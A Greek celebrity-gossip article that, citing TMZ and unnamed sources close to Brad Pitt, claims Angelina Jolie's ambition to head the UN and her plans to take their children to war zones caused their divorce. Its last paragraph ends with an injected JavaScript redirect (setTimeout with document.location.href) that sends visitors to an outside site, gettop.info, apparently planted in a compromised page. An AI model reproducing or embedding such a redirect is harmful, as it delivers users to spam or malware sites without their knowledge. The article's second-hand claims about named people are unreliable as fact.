Οι φιλοδοξίες της Τζολί για τον ΟΗΕ οδήγησαν στον χωρισμό

0
7

 

Η πρέσβειρα καλής θέλησης του ΟΗΕ Αντζελίνα Τζολί μάλλον θέλει πολλά περισσότερα από έναν απλό ρόλο όπως αποκαλύπτει το ΤΜΖ που επικαλείται πηγές κοντά στον Μπραντ Πιτ.

Σύμφωνα με τον σταρ η τέως σύζυγός του επιθυμεί διακαώς να γίνει επικεφαλής του ΟΗΕ και αυτές οι πολιτικές φιλοδοξίες στις οποίες η Τζολί έχει αφοσιωθεί εντελώς οδήγησαν στον δραματικό χωρισμό τους.

Ο Πιτ λέει ότι η Αντζελίνα έχει και ειδικό «δωμάτιο» πολέμου και εκεί συσκέπτεται με δύο πολιτικούς αναλυτές ώστε να τη βοηθήσουν να σχεδιάσει στρατηγική και προφίλ πολιτικού ώστε να διεκδικήσει με αξιώσεις την ηγεσία των Ηνωένων Εθνών.

Ο σταρ του Χόλιγουντ στήριζε μέχρι στιγμής την προσπάθεια που κατέβαλε η σύζυγός του ως πρέσβειρα αλλά πλέον οι φιλοδοξίες της έθεταν σε κίνδυνο την οικογένειά της καθώς ήθελε να παίρνει μαζί της τα παιδιά τους σε ζώνες πολέμου όπως ο Λίβανος και το Ιράκ ώστε να δείχνει ένα πιο ανθρώπινο πρόσωπο.

Η ίδια είχε πάντα μαζί της μία ισχυρή ομάδα ασφαλείας αλλά το να παίρνει μαζί της έξι παιδιά ήταν κάτι που εξόργιζε τον Πιτ. Ο τελευταίος καυγάς τους που ήταν και ο σφοδρότερος έγινε επειδή η Τζολί ήθελε να πάρει μαζί της τα παιδιά ώστε να πάνε στη Συρία και να βοηθήσουν στην ανοικοδόμηση της χώρας κάτι που ξεχείλισε το ποτήρι της υπομονής του Μπραντ Πιτ.

Μάλιστα, όπως έγεται δεν τον ενδιαφέρει καθόλου πώς θα μοιράσουν τα περιουσιακά τους στοιχεία αν και τα περισσότερα ακίνητα τα είχε αγοράσει ο ίδιος πριν ακόμη τη γνωρίσει και λέγεται ότι αυτός πούλησε για να αγοράσουν τα τρία ακίνητα που είχαν μαζί. Αλλά θα δώσει μάχη μέχρις εσχάτων να έχει την κοινή κηδεμονία των παιδιών τους καθώς δνε την εμπιστεύεται καθόλου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here